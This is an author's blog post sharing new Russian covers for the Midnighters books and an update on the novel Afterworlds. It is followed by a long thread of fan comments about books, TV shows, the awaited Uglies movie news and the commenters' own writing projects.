More Midnighters Covers

March 11th, 2013

Because Russia has to have new covers every year, or something.

Here they are:

russiamid1

russiamid2

russiamid3

I don’t have much to say about these covers, except that I love the darkling dragons in them. For the earlier versions, click here.

Insert here the usual apologies about not blogging lately. Yes, I have been taking rather a long break. But I assure you, it’s only because I’ve been writing loads. I’m at about 70,000 words in my current work in progress, currently titled Afterworlds.

Now, what does 70 kilowords this mean? That this book will be out soon?

Hah! I’m afraid not.Afterworlds is going to be a long piece of work, with two novels wrapped into one in a strange and mystical way. I’m maybe halfway done, so the novel isn’t going to be in anyone’s hands until late next year. (Or later, because art is no science.)

Anyway, thanks to those who continue to hang around my dusty windblown blog. I apologize for letting this space that we’ve all created together lie fallow. But rest assured that some day it will spark back to life, when I have more energy and time, or simply find something to rant about.

Till then, hope you’re all having fun.

97 Responses to “More Midnighters Covers”

Bow ties are Cool
    March 11th, 2013 13:39

:) first comment

cool pictures

Rose
    March 11th, 2013 16:01

Why must everyone’s covers be cooler than ours?

Laura
    March 11th, 2013 16:39

What about the uglies movie? You said you would post some news about it a few posts ago :(

Kiera
    March 11th, 2013 17:54

I’m so excited that your new book is coming along! I can’t wait for it to come out!
    Awesome covers!

nerezza
    March 11th, 2013 23:15

I’m excited for Scott-la’s new book (insert fangirl giggle here) but I’m still going crazy for this uglies movie news. YOU PROMISED US! Just for the wait, you shoudl give us all advnaced copies of Afterworlds. Or at least tell us what it’s about.

March 12th, 2013 01:27

wow even the title has me interested! hmm… “Afterworlds”… sounds epic. why do the Russians have such epic covers? *prints out images and tapes them over my books*
    UGLIES MOVIE NEWS??? where is it?

March 12th, 2013 02:24

Yes, there will be Uglies movie news soon. There was a delay as we look at things again and get them exactly right. All I can say is . . . soon (-ISH).

Oraldisaster101
    March 12th, 2013 03:07

Wow, I really really love the darklings. A lot. And less blogging just means that we enjoy the posts we get more.
    Mlegh, who am I kidding? I hate waiting…

March 12th, 2013 03:49

@ Roxanne (whenever you show up here :) ): It took me a while because I needed an Italian name that wasn’t PAINFULLY Italian. I got it down to four, then chose. Mine is a nickname too! (LOL I think he would die if anyone called him Leonardo. XD not really) It actually became ironic later, when I realized he had the same name as da Vinci, who created the perfect man ideal, and then Leonardo Bruni, who named the study of old Latin and Greek classics and Church Fathers “humanism.” It’s ironic for secret reasons. :P XD Mine is futuristic, but I changed the past around. So it wasn’t our present that the world evolved from….if that makes any sense….

Oh! And I’m so sorry! You were right! CampNaNoWriMo IS in April and July this year. I just got an email from the Young Writers’ Program saying that, and that YWP is participating this year. That could’ve saved me making two accounts last year…. I’m doing July. (With Leo’s sequel =D) You?

Beatrice
    March 12th, 2013 04:39

[IMG]http://i46.tinypic.com/20igv4p.png[/IMG]

Made this :D

Beatrice
    March 12th, 2013 04:40

Sorry didn’t work before:

Kristina-la
    March 12th, 2013 04:43

You just love to torture us don’t you? lol. oh well, I’m use to it by now. I’d have to be seeing as I’ve stuck around since 2007 :P

TrueUgly
    March 12th, 2013 05:51

I went dress shopping yesterday, and I was once again reminded why I wear mostly black. I look dead in everything else, I’m so pale. -_-

I really want to read Midnighters, I’m still searching for a copy of it… :/

My history teacher was talking about the good ol’ days last week and he goes “We didn’t have toys back then, we’d clean out the barn then play king of the mountain on the manure pile. You ever hear the term ‘tastes like crap’? Crap doesn’t actually taste all that bad. It’s kinda neutral.”
    I laughed so hard!

March 12th, 2013 07:02

@9: Your book sounds cool. And the alternate present/past thing does make sense.
    As for CampNaNoWriMo, I’m not sure I’m gonna do it. NOT because it’s intimidating, but because since I’m already in the midst of writing a novel, I don’t really feel like I need to. I realize that it’d be good for me to do it anyway, but I’m slow enough when it comes to writing, and I have to finish my chapters monthly. I give them out to my family and friends so they can force me to keep my deadlines (without their insistence, I’d probably have gotten lazy and quit long before chapter 6).

Also, this might sound like a weird question, but: are you a boy or a girl? I feel like you’ve mentioned it before (but they’re a lot of people on this blog, so I may be confusing you with someone else), but “Midshipman K” is kind of ambiguous.

Isaac
    March 12th, 2013 08:30

Scooooooooooott, please post more! :’O
    I visit your blog everyday in hopes that something has been posted… Uglies movie news. Soon. Please. Thanks.

March 12th, 2013 09:52

@14: Wow, I wish I had that sort of commitment! It’s all fine and good to write a novel in a month, but since then I haven’t done any REAL writing, except for my Alpha app story. (Which makes me feel guilt when I give it to my friends for criticism and they ask me if they can read some of my other stories….because I have none. >.<)

In answer to your question (which is totally fine by they way lol), I am a girl. Sometimes I forget that this isn't like DeviantART, where you can just go to my profile and see my gender. XD Also, I assuming you're a girl….?

March 12th, 2013 10:13

@16: Maybe you should try it. When you have people eagerly awaiting the next installment of your story, it motivates you to get it done. Like I said, I may not have even finished chapter 2 without everyone egging me on. And if it makes you feel any better, I only have a few stories myself (like, six maybe?).

I suspected you were a girl, but I didn’t want to say that in case you were a guy and I insulted your masculinity or something, lol. And yes, I’m a girl, too (Roxanne would be an interesting guy’s name).

[AAAGGHHHH! Still 5 weeks before we know if we're accepted!!! TIME MOVES SO SLOW!]

nerezza
    March 12th, 2013 23:14

Validation on the Uglies movie: Yay! I fancast that book so obsessively, it isn’t even funny. Scott-la, you should have the producers look at my cast. It’s fantastic!

March 13th, 2013 03:14

@17: It does seem like a really good idea. I’ll try it, but maybe in a month or two when I’m no longer so busy. ^^ Yeah, my problem is having ideas or impressions of things, but not actual stories. There’s like four that I’ve got really thought out.

LOL That’s okay. Right after I got my hair cut, someone mistook me for a boy from behind. It was so funny, because they asked my sister and I if we were fraternal twins, then we said we were identical and the person did a double-take and looked at me closer and was like, “Oh….” XD

[AHHH! I'm trying not to think about it! Strangers reading my story, judging me....O_O]

March 13th, 2013 03:30

Those covers make me want to read the series…
    Miss me, anybody? XD

Did anyone know that Harry Potter uses the phrase “Barking mad” in the sixth book? I was listening to the book and he said it and I went all fangirly. LIKE. A. BOSS.

March 13th, 2013 03:41

@20: OMG THAT IS AWESOME.
    I remember in a bonus feature of the seventh movie part two (I think) there was a discussion between Jo and Dan and Jo used the phrase “stark staring mad” and I was reminded of Chapter 30* of Goliath when Deryn was thinking that Alek’s company kept her from going “stark raving mad.” <3 I couldn't stop using those two phrases for the longest time. Also, my sister will constantly point out the quote from Philosopher's Stone**: "'Barking,' Uncle Vernon said. 'Howling mad, the lot of them.'" XD

*For those who haven't read Chapter 30 a million times, it's the chapter that takes place perpetually in Deryn's cabin and is basically just Deryn and Alek talking. (After the Mexico incident) I LOVE THIS CHAPTER. ^^

**I'm American but I prefer the British title, kay? Yeah. ^^

March 14th, 2013 01:53

@19: Yeah, I’ve got several full novel ideas that I just can’t seem to really flesh out. One series I have I want to be six books, but right now I have no clue as to what happens in most of the middle ones. (That’s my only really long series though.)

Well, I’m not exactly sure who reads and judges the stories, but I’m sure they’re just as cool and lax as the Alphan staff.
    What’s your story about anyways?

Sophie-la aka Sorley
    March 15th, 2013 01:01

I only recognize 2 names on here :( I remember when we got 2k comments a day… Ugh I miss that </3 I miss my uglies friends. I just re-read specials so Scott-la.. Please hurry on the UPSE movie news(: I'll be the first in line at the midnight premiere

March 15th, 2013 05:34

Cool pictures! I still think there’s some sort of unspoken rule that other countries get the best covers.
    I fully understand that your work has occupied your time and effort, so it’s fine that there hasn’t been much posting.

March 15th, 2013 05:38

I really hope the Uglies movie news isn’t a statement that there won’t be one, but I can wait and see. Patience is a good skill to develop.

TrueUgly
    March 15th, 2013 07:14

@23- SOPHIE-LA! It’s been ages since we last talked!

So how has everyone on here’s lives been going?
    I’m pretty good. I’ve decided that I wanna be a piano technician when I grow up.

March 15th, 2013 20:20

@26: Pretty well. School filling up most of my time, but that’s a good thing I suppose.

March 15th, 2013 21:38

@26: Life’s goin’ good.

…I’m reading a manga called Death Note, and the main character’s name is Yagami…my friend pointed out that Yagami backwards is I’m A Gay. It was pretty funny.

March 15th, 2013 23:55

@28 Death Note is great! how far have you read?

March 16th, 2013 02:42

@29: Ummm…I’m reading it online so it’s hard to tell. The fifth book, I think. L is adorableee…^-^

TrueUgly
    March 16th, 2013 04:22

I’m glad most peoples’s lives are going good.

Today we had a student vs. Staff basketball game, which I played in. They never call the teachers on anything, so if you ever have a game like that, don’t try to take a charge. They got the points and I hurt my wrist. But it was pretty fun anyway. I made my school all do the wave .

March 16th, 2013 10:33

@22: WOW! Six books? The longest idea I have is a trilogy….And I’m going to try to write the second for July CampNaNoWriMo but I only have a slim idea of what will happen. For sure, I just know the first book and the end of the third. But who knows what will happen really?

My Alpha story is about a girl who seeks the help of a cursed witch woman to find her sister, because no one else will help. It’s traditionally fantasy,in my opinion, because that’s all I could find at the time. I had a month, and it was the first thing I came up with. It was a extension of a scene we were supposed to write in English class, focusing on sensory details, which actually helped because I’m usually so lax on description. My biggest fear about it is that it’s cliched, but I find my ideas of cliches tend to be more detailed than other people’s. It’s called One Thousand Souls. What about yours?

March 16th, 2013 10:33

@28: OMG DEATH NOTE <3 I haven't finished it yet, though….I have no time….

March 16th, 2013 22:36

@31: I can’t think of anyone on my school’s staff that would even attempt a charge, ’cause there goes their back for a couple weeks. ;)

Rose
    March 16th, 2013 23:03

@31 last year, my school had a student/staff basketball games too. It was great fun to watch as the student team is really good, while about half the staff team was about half people who played college ball, and half the least sporty people imaginable. My then English teacher was one of the latter.

March 16th, 2013 23:26

@32: Well, like I said, there is a LOT of empty space. At this point it’s pretty much six books just because it always has been, but whenever I seriously get down to making HARD edits, that is likely to change. It’s a complex story I’ve had with me since I was like eight, growing and changing as I do, and basically I feel the only way for “future audience” to love my characters as much as I do is to give them a million novels, lol.

That actually sounds nice. I find it’s quite hard to write a nice short story with a solid beginning, middle, and ending. All my ideas usually end up being too big for 6000 words.
    Anyway, my story is about a girl who cuts herself to force spirits to leave her head. She gets sent to a cutter institution (because, of course no one understands), but then someone is murdered there. Unable to get a knife to cut out the person’s ghost, she solves the case instead. Lemme tell you, writing a DECENT 6000-word murder story is quite tough. Not nearly enough time to introduce red herrings people will believe. Hopefully I pulled it off well enough.

March 16th, 2013 23:26

NOOOOOOOOOOOOOOOO L WHYYYYYYYYYYYY???????

I HAAAAATE YOOOUUU REEEEMMM!!!!!!!

March 16th, 2013 23:27

*cough* Pardon me while I go into mourning for L.

March 17th, 2013 01:38

@38 it’s ok. i kind of thought that too when i read that part.

March 17th, 2013 02:27

@36: Yeah, my one other novel that I have really worked out changes like that. Plus, I can’t grasp the voice of the character because she’s so NOT like me. I love her anyway….She’s just difficult. Too logical. How on earth did I create a math and science character when I’m so history and English?

I admire your effort to write a mystery in 6000 words! I’m actually pretty bad at writing short stories; 6000 words is usually one or two chapters for me. I just hope I wasn’t too brief; my story was 5700. I don’t think I was….I hope….

@38: DON’T! SAY ANYTHING ELSE! I DON’T WANT TO KNOW! GAH! *hides in the corner*
    Okay, sorry, I’ll just try to ignore any more Death Note spoilers.
    *continues to hide*

March 17th, 2013 03:26

@40: 300 words off from the limit is NOT by any means “brief.” The minimum is 2000, that’s brief. 5700 is perfect. But it’s better to be brief anyway. I was right on the doorstep of 6000 the WHOLE editing process. It was a nightmare. I was like, “Okay, if I add this, what has to leave?” Gah, awful.

My Alpha story narrator is quite like me. Not her deadpan manner (I could never speak my mind like that), but her overly-sarcastic personality. :) I actually do that with my novel, too. The narrator isn’t a character in that one, but still quite snarky. Otherwise, I’m very serious in my stories. I like to think all my characters (narrator and otherwise) are different and unique, but I don’t think I’ve written enough to know for sure.

March 17th, 2013 22:20

@41: I thought I would be having your problem. Thank God I didn’t; my English teacher and I sort of have this….understanding. She always stresses the MAXIMUM pages, because when we were doing a Rite of Passage essay, I couldn’t bring mine down to three pages so I….deviated from MLA format and and made the font 11 point. She took off a whole letter grade. There went my A….

My Alpha narrator is….much more jaded than I am. And she has way more at stake; which is sort of the point. But she’s not like Miranda in that Miranda is very logical and tries not to get emotionally involved in anything. (But obviously she would change….) There’s actually a character in my novel with Miranda that is like an exaggerated me (she’s read all the books that I’ve had on my To-Read list for years and she quotes even more than I do, which is saying a lot). She’s nice and fun to write. I am SO bad at sarcasm; it comes to me so rarely. But my dad is really sarcastic, so that helps. I like to think that my characters vary from each other, as well. The one trend I’ve noticed in my girls is I cannot stand weak girls. Whether they’re sarcastic, headstrong, loyal, downright mean, or whatever, they’re never weak, like damsel-in-distress style. *shudders* When we were studying archetypes in English class, I honestly couldn’t come up with anything for Damsel in Distress because I hate being cliche and putting Disney princesses. (Now, though, I suppose I could’ve put Cossette….)

March 18th, 2013 01:45

@40- ACK! sorry…*ashamed*

March 18th, 2013 04:50

@43: Haha, it’s okay. I’ll just try not to read anything if it comes up….

March 18th, 2013 07:01

@42: Yeah, it seems like no matter what series I read, the main characters always become annoying. That’s what I love about Leviathan, Alek and Deryn never got old or obnoxious!
    I try to make strong characters, but the people in my novel…well, I’m sorta making fun of the whole “damsel in distress” thing in a melodramatic way, so they’re special. One of my main females is ridiculously pure good, but not in a good way. I hate when characters are all “I’m so good, I can’t do anything bad ever, even if the bad guy doesn’t deserve any more chances to change and I just really need to kill them” (OUAT: Snow, I’m looking at you), so I’m having the narrator point out how she’s actually kinda useless in her goodness. And the other female is the exact opposite: ridiculously evil.

March 18th, 2013 07:43

@45: I know. Deryn and Alek are just….I can’t even find the words. I was so doubtful about the book at first, too. Especially of Deryn, because everyone knows girls disguised as boys never last long and I expected her to be all arrogant and whatnot. But she did! And she wasn’t! And it fit and it was realistic and they were just so many things that I hadn’t expected. And Alek….I don’t know what I expected of him, but who he really is is just so endearing. I picked up Leviathan so many times before actually reading it. I was a Dummkopf, but I often am, so that’s okay. (Seriously, everything I love I thought I would hate, from Leviathan to Harry Potter to Lord of the Rings to ballet to even my dream college. You’d think I’d learn by now.) I wish I could write characters as beautiful as Deryn and Alek. Not to say they don’t have their flaws–because we all know they do–but that’s part of what makes them so very lovable. Okay, I’m rambling now. Stopping….

What you said about “good” characters reminds me of Jem, if you’ve read the Infernal Devices trilogy. And even all the characters believe that, have said it to his face. “You’re just so….good.” ; “Nothing is above mockery.” “Jem is.” ; etc. SO ANNOYING. Especially when my sister is obsessed with him. Ugh, ugh, ugh. Even the truly “good” characters have flaws, like Finny (A Separate Peace) and Hassan (The Kite Runner). I’m also a very strong believer in the anti-hero. I can spend an entire books believing that the villain is actually a good guy. (That seriously happened with Poison, but Aelthar was murdered before I could prove my theory.)

What’s OUAT? I’m trying to figure it out, but I’m not getting the reference. Sorry. :(

March 18th, 2013 09:27

@46: Oh, I could ramble about Dalek and LBG all day! I wanna meet Scott so bad…! Sorry, will. Not. Let. Myself. Rant!

I read the first three TMI, got annoyed that she decided to continue the series and didn’t read the others, and read the first TID before I got bored (Will is a complete copy-cat of Jace. Also, Tessa GRAY, Clary FRAY…really?).
    I don’t see how it’s so “good” not to kill the bad guy when it puts innocent people in danger. That’s being a bad ruler.

OUAT is Once Upon a Time. You should look it up, because I’m bad at/hate explaining premises to complex TV shows. If you like villains with backstory, you might actually enjoy it, although I feel it’s been poorly executed. Anyway, the person I’m talking about is Snow White. She’s so freaking good, but kinda pathetic in her goodness. I could literally rant about all the problems with this show I want to DESPERATELY to love, but I’ll just say this: she reclaimed her kingdom, caught the evil queen, gave her one last (billionth) chance to change, and then when she refused, STILL couldn’t bring herself to execute her! And look what happened, a 28-year curse that ripped your daughter from you! [<--Sorry, ranting. Like I said, so many issues with this show.]

March 18th, 2013 10:56

@47: Yeah, I used to love the books. Not anymore. This is how I feel now: The whole world can go to hell and everyone can die as long as Magnus and Alec are okay. It’s mean, but I honestly couldn’t care one bit about the rest of them.

Oh! I know that show! I remember when it first came out I thought it would be really interesting, but then I actually saw a few episodes and the characters were just….weak. 2-D. It’s totally okay to rant. The world is full of so many disappointing characters.

Rose
    March 18th, 2013 16:20

@47 I agree that all the characters are copies of each other (though, TMI was started before TID, but who cares, they’re all the same characters with different names). That’s one of the reasons I like Scott’s writing so much, through different series, his characters are completely, totally, and utterly unique (and not in the least redundant)

March 19th, 2013 00:17

@48, 49: Don’t get me wrong, I still love CoB, CoA, and CoG, but all the rest in her entire Shadowhunter world can just…die or something, I really don’t care. And I think, given where we are, we can all agree Scott and his stories are AMAZING! (Rose, did you apply to Alpha, too?)

I don’t remember the last time there was a real fantasy show, you know? Everything’s like a sitcom, or a teen or crime drama. Same with movies. What happened to awesomeness like Stardust? I think the fantastical era is over, at least for now. :( That’s why I was so excited when OUAT came on air, it was about fairytales for Pete’s sake! But, especially now in the second season, it hasn’t done much but disappoint. :’(

Also, Midshipman K, there’s a “worry thread” over on the Alpha site, if you want to, you know, worry, lol: http://alpha.spellcaster.org/2013/03/01/the-2013-worry-thread/

Rose
    March 19th, 2013 01:01

@50, no I didn’t apply, all of my free writing tends to be mediocre at best, but I do have a friend who’s half way through writing her first novel (and it’ll be a good sized novel too, about five, six hundred pages!).
    I kinda agree with you about the whole fantastical era being over (though one can make an argument for sci-fi picking up the slake a bit). Also, Stardust is awesome! I’ve seen the movie and am in the process of reading the book, as I’ve been coerced to do both by my friend (the same one who’s writing the book) for several years. Unfortunately, it’s only now I’ve had time to catch up on Neil Gaiman.

March 19th, 2013 04:25

@51: You should try applying to things anyway, just for experience (if writing is something you’re seriously interested in), no matter how good. That’s why I applied to Alpha. I thought I probably wouldn’t make it, but just for experience I applied anyway, and I DID get in! I was shocked!

Stardust may be my favorite movie ever! [If you liked that, you should try the mini-series "The 10th Kingdom." It's 8 hours of AWESOME!] I didn’t actually like the book too much though. I read it AFTER watching, so that might have affected my perception some (’cause it’s REALLY different), as well as having read it a few years ago, so maybe I was a little young for it then. The only other Neil Gaiman I’ve read is Coraline, which was fantastic (graphic novel > regular book)!

Rose
    March 19th, 2013 05:35

@52 try Neverwhere and American Gods, too I just read both and loved them. They’re great if you like books with accompanying extras too (neverwhere’s got a miniseries from the 90′s and now a recent radio edition, and American Gods is being made int a show). They are both for a slightly older audience too. I’d place Neverwhere in YA and American Gods as adult (mostly for langue but it has a bit of suggestive content as well). I’m kind of on a Neil Gaiman kick at the moment, as the last ten books I’ve read have included five of his. But I’m not ashamed of that because he is an AMAZING writer.

March 19th, 2013 07:23

@49-53(Rose and Roxanne): Ah, where to begin?

Rose: I LOVE Neil Gaiman, but I actually haven’t read a lot of his work. The first thing I read by him was, naturally, Stardust after I saw the movie. Couldn’t decide which I liked better, but I agree that the movie is a good adaptation, even if it deviates a bit. Have you read Sandman?

Roxanne: Same here! I loved the first three, but really thought she could’ve stopped there. I assumed Jonathan was dead like all other demons and went to a different dimension. End of story. Now look what she’s done to the only two worthwhile characters. My Malec….*sob*
    (On that note, Scott: Thank you for actually letting your characters be happy once everything was over. THANK YOU. Really.)
    About fantasy shows, I never knew there were any. Except for maybe some urban fantasy or something….and Merlin. Does anyone here watch Merlin? I know it’s silly sometimes, but I actually like it. The characters aren’t the most original, especially when you can always count on the bad guy to lose (which gets really redundant with Morgana) but I don’t know….Bizarrely, I like it. Need to see the fifth season, though.

Rose: Thinking about your originality comment about Scott’s characters, I’m actually now realizing that I don’t even know any other Eddie Malone types, or Volgers, or Dr. Barlows–and especially Alek and Deryns. I can’t have much of an opinion yet on UPSE and his other books because….(Don’t kill me!) I haven’t read all of them yet. (I’m sorry! Please don’t kill me! I have no time to read much anymore. :( )

Roxanne: XD Checking out the worry thread….

Her Imperial Maliciousness
    March 19th, 2013 07:53

aw, everyone hates TID

March 19th, 2013 08:12

@55: I like Magnus! And the third book is currently sitting on my living room table. But my sister gets it first. Traditionally, I got Cassie’s books first and she got LBG, but we made a deal to switch that. She got CoLS, CoHF, Clockwork Princess, and probably all of the Dark Artifices so I could have The Manual of Aeronautics. It’s been 207 days and I still haven’t given it to her….XD

March 19th, 2013 08:43

@53: Oh, will check those out! And I’ve just remembered I have read Good Omens by Neil Gaiman (and Terry Pratchet). It was…interesting. Funny, though.

@54/56: It’s nice to know that other people hate her continuing the series. Everyone that’s read the books (albeit they’re all on the internet) are always like “OMG I love all your books, and never stop writing them!” Meanwhile I’m like “Are you ever going to write anything else? Enough with the shadowhunting!” Jonathan’s little ambiguous ending there didn’t bother or “hook” me either!
    It’s funny you should mention Merlin, because I literally JUST started watching it (like only the first 4 episodes). I like it too, even though what you said is true. No spoilers, please!

And dittoing everyone else: Scott’s characters are super original! I never thought about it before… I really need to read UPSE… Loved Peeps, though (The Last Days not so much…)!

@55: Your user name reminds me of “Her Imperial Viciousness,” which is how all servants are supposed to refer to Redd in The Looking-Glass Wars books by Frank Beddor. They’re good reads. I’m currently reading the third/last one.

Rose
    March 19th, 2013 16:17

@54 I agree she should have at three. Other than the fact that the series can to a natural close (bad guy vanquished, everyone happily ever after) it made more sense to only have three. There three mortal instruments, three main characters (Clary, Jace, and Simon) and I’m sure I could find more threes if I looked.
    Merlin! I’m about halfway through, but thanks to the Internet I know what happens at the end. Midshipman K, do all you can to avoid spoilers!
    Also, no need to worry about not having read Scott’s other books, I haven’t read them all either (just the ones more or less readily available at my library). And as of UPSE, well, I’ve never really gone in for the whole dystopian craze, even if they were published way before said craze actually started.

Moggle(;
    March 20th, 2013 02:35

Hey, could someone (whoever reads this) please answer a question!
    Did Scott’s blog used to get way more hits? As in more comments and stuff?
    Has anyone been on this blog for several years? :)

Moggle(;
    March 20th, 2013 02:38

ALSO!! How come there hasn’t been a Fan Art Friday for so long?! :(

Rose
    March 20th, 2013 02:40

@59 yeah, it did. I have no idea what happened, but there used to be around 150-200 comments in the first week of a post. Also, that was when we used to have fan art Friday every week (crazy, I know!) so the number of comments had less time to build up.

Her Imperial Maliciousness
    March 20th, 2013 02:45

@57- YES SOMEONE FINALLY NOTICED THAT!

March 20th, 2013 03:50

@TMI discussion: Now that we are fulling discussing TMI, I just have to say something: did anyone feel like it was a REAL love triangle? Clary was never “torn” between Jace and Simon. She was completely devoted to Jace, found out he was her brother, and so she begrudgingly gave into Simon’s advances, and even that didn’t last that long. They were sorta together until the Seelie Court scene in CoA (where she kisses Jace), and then I’m pretty sure they never “got back together.”

@60: I agree! We need more Dalek fanart!! …er, Fanart Friday…

@62: Haha, I would’ve mentioned it sooner had your name actually been “Viciousness” instead of “Maliciousness.”

March 20th, 2013 17:12

@ everyone talking about Neil Gaiman – I saw Stardust and loved it. One of the best movies ever. I read the book afterwards, but I was too young and it seemed very boring compared to the movie…..I should read it again sometime….
    Anyway, you should definetly check out Mirrormask. It’s a movie, and Neil Gaiman was the writer, or something. If you liked Stardust, I think you’ll like this one, even if the themes are completely different. It’s just a mind-blowing film!

March 21st, 2013 11:23

@57: Avoiding spoilers starting now! My lips are sealed. :) And I love the Wonderland books! It’s been so long since I’ve read them, but you mentioning that brings things back a bit….

@60: Oh my gosh. I literally saw that and remembered there were such things as Fan Art Friday. Has it really been that long? This is bad, very bad. SCOTT-LA. Help!

@63 (Roxanne again :) ): I used to care about that love triangle….but when she was with Simon it just felt wrong. Like everyone knew it was Jace she wanted, so why even be with Simon? Poor Simon. Simon is the one other character I care about sometimes. Like with his sister. So cute…. Plus, I just love that he’s Jewish. And I love all the TMI fans who battle against Edward with this much more awesome vampire. (Because I can’t stand Twilight, end of story, good bye.)

@64: Mirrormask is SUCH a cool title. Thanks for the suggestion! Looking it up nowses….

OOOOHHHH. In my APEuro class, WE’RE ON WWI!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! My teacher keeps talking about all the alliances and everything building up and up and up and I’m like, “I KNOW THESE THINGS.” On that subject, I have conflicting information about the location of Franz and Sophie’s grave. I read somewhere that he knew he would be buried with the rest of his family, but Sophie wouldn’t, so he set it up that they could be buried together somewhere near Prague. But then someone told me that Franz was in Vienna, and they didn’t know where Sophie was. Maybe you aren’t all crazy like me with looking up Alek’s parents, but if anyone knows anything, please tell me! (Because, yes, I want to visit their grave someday. Hmmkayyeah. I love them. They’re so cute.) Also, some sources say they were married on July 1, but some say June 28. Please, someone, please, tell me they didn’t get married on the day they were killed.

Okay, nerdiness over. I’m not sure if I’ve put this link here before, but whatever. For those who have read the Leviathan trilogy only, because it has spoilers. :)

Hope it works….

Alex-wa
    March 21st, 2013 18:37

@59- Yes, I’ve been on this blog since Extras came out. It’s been so long, all the people I talked to here when I was still in high school are gone, or at least don’t comment anymore. I’m not that old though, I’m just 18 and a college freshman now. Well, I suppose that may be old for some, lol. But yeah, we used to use this to talk about all kinds of things, and there would be tons of new comments everyday. We would actually be talking live- we’d refresh the page to see the comments as they were posted. If you look waaaaay back and see the comments on Scott’s posts from years ago, you’ll see how many comments there were. I wonder if any of those people still read this blog but just don’t comment. And speaking of Fan Art Friday (Which I miss also!), I think one of my fan arts was posted on here a long time ago. Or maybe I’m remembering it being posted on The Smoke Lives, an old Uglies fan site.

Zac-la
    March 22nd, 2013 06:46

(I keep changing my name)
    Thanks everyone for answering my questions! It sucks that less people come on the blog anymore but since Scott hardly posts it’s kind of inevitable :(
    I’ve never been able to work out how to use the chat forum thing… do people still post new stuff in that?
    I actually have some art (well a photo) I want to submit for FAF but since he never does it anymore I don’t see the point… oh wait it’s Friday today! (In New Zealand anyway)
    We should all try to do like a chat thing?

Zac-la
    March 22nd, 2013 06:48

Oh one more thing, who’s on facebook? None of the Scott Westefeld related facebook pages are active which is so annoying! I actually want to start a page for Westerfeld fans but I don’t know whether there are any on facebook anymore :O
    Would anyone be interested in a page? Reeeeeeply :D

March 22nd, 2013 08:18

@64: Ditto about Stardust (book and movie). I will definitely check out Mirrormask!

@65: I never really thought of it as a love triangle (though I heard from everywhere that it was). I actually never cared for Simon much, but I agree he is a cooler vampire than Edward (I guess I should say Cassie Clare’s portrayal of vampires is cooler than Stephenie Meyer’s).
    Sorry, I don’t really know anything about WWI outside of LBG.
    Watched the link, it’s nice to hear someone else rant about how perfect LBG is. :) …then I proceeded to watch a million more of her videos. I’m surprised she likes Twilight, considering her feelings on weak characters (*cough* Bella *cough*), but I like the way she handles it, and don’t judge her for her opinions.

@68: *shrug* I’d be interested in a LBG page.
    Scott, we NEED FAF back!!!!

March 23rd, 2013 01:02

@68: I don’t have Facebook. I guess I’m afraid I’d get addicted to it or something, or I’m being rebellious. Maybe both.

March 23rd, 2013 03:24

@70: Yeah, there is a great chance of addiction. I spend WAAAAAAAY too much time periodically checking this blog, the Alpha worry thread, Facebook, and my E-mail.

March 23rd, 2013 05:31

@68 – Yeah, I don’t have Fecebook either. I think I don’t want my whole life to be so public, or so depending on one place. I don’t know if that makes sense.
    I’m cool with just e-mail and Westerblog, thank you very much.

Zac-la
    March 23rd, 2013 09:53

@70 @68 I can see where you’re coming from BUT you can keep your profile closed and not put anything about yourself on there. Personally I think it’s a great way to meet other fans :)

March 24th, 2013 12:11

@68: Yeah, I don’t have a Facebook either because I watch Criminal Minds. LOL Anyway, I might have to get one because one of the supervising GSA teachers wants me to be an officer next year and our club communicates mostly through Facebook. Totally unrelated, but there you go.

@69: I haven’t actually watched many of her videos, but I can quote that one by heart. The thing is, I’m so busy and I don’t want to watch a video about a book I haven’t read. I’m so glad she likes Legend and Prodigy, though. I, too, am surprised about her liking Twilight. Since I don’t care about those “books” I guess I could watch that video.

I just had the most surreal experience at a book signing with Cassandra Clare and Sarah Rees Brennan….I can’t even believe I talked to them. Okay, we don’t like Clace and Simon and all that yackum, but Cassie made up Magnus and Alec. O_O And I talked to her about….the ending of Lost Souls….GAH. And it was weird to be in a room where everyone knew what you were talking about when you said ‘Mortal Instruments’ or something because I find that even bestselling books draw a majority of blank stares at my high school. Now I’m wondering what it would be like to be in a room where everyone knew about Leviathan….OHMYGOSH AN EXPERIENCE TO DIE FOR.

Rose
    March 24th, 2013 22:20

@74 I honestly can’t imagine being in a room where everyone knows what I am talking about.

March 24th, 2013 22:34

@74, 75: Yeah, Alpha’s weird if you’ve never experienced something like that. Being with about 30 other writers (4 guest authors, approx. 10 staff, 19 other students) is totally different. Everyone knows about your writerly problems and understands them. Also, at least ONE person has probably read whatever book you’re talking about. :)

@74: I am so jealous you got to meet them (although I haven’t actually read SRB yet)! It’s probably better that I didn’t get to meet Cassie, though, because of my strongly negative feelings toward CoFA and CoLS…

And this is kinda off the point, but I used to watch Criminal Minds, too! I can’t exactly remember when I quit watching, but it was sometime right after JJ left. And honestly, the show was never QUITE the same without Gideon (I just hate Rossi).

March 25th, 2013 01:03

@76: Alpha sounds even more appealing and more scary now….

I actually haven’t read any of Sarah’s books yet either. It’s so annoying because I REALLY want to. They just sound so interesting. I have Unspoken right now, but I have to finish Clockwork Princess or my sister will kill me. And we’ve had Team Human for months….Which was co-authored with Justine, thus making it doubly awesome. :)

When I met Cassie, she saw my arm (which was covered with Malec quotes that I’ve been reapplying for over a month) and it was so weird having someone see the writing and KNOW what it was. She asked me how I felt about the end of Lost Souls….Ohmygosh….

Really? I like Rossi better….I mean, I like Gideon too, but Rossi was there for more important things. Sort of. I just like them both, but Rossi more. I don’t like how Gideon left. I liked his fatherly relationship with Reid, though, because Reid is why I started watching the show at all. I was upset–SO UPSET–when JJ left, BUT SHE CAME BACK. But Emily….I love Emily and I miss her so much….Seriously, this was the first TV show I ever actively watched. I never like TV before CM….

March 25th, 2013 09:30

@77: How could you possibly like Rossi better? Gideon was played by MANDY PATINKIN! He’s just super amazing! Plus Rossi annoys me all the time. And I love Reid! He’s just awesome. I like Hotch. Morgan is annoying sometimes (he’s like the worst interrogator ever), but he tackles people, so it’s cool, lol. I like Emily, ESPECIALLY because she’s so much cooler than Elle, whom I absolutely loathed. JJ’s cool. And Garcia is super crazy but still cool (although honestly her and Morgan’s relationship kinda creeps me out, lol). I don’t know if they’ve introduced more characters since then, but those are my feelings on all the ones I’ve seen. Sorry to rant about fictional characters on CM… of course, we all always rant about fictional characters! :)

March 25th, 2013 09:43

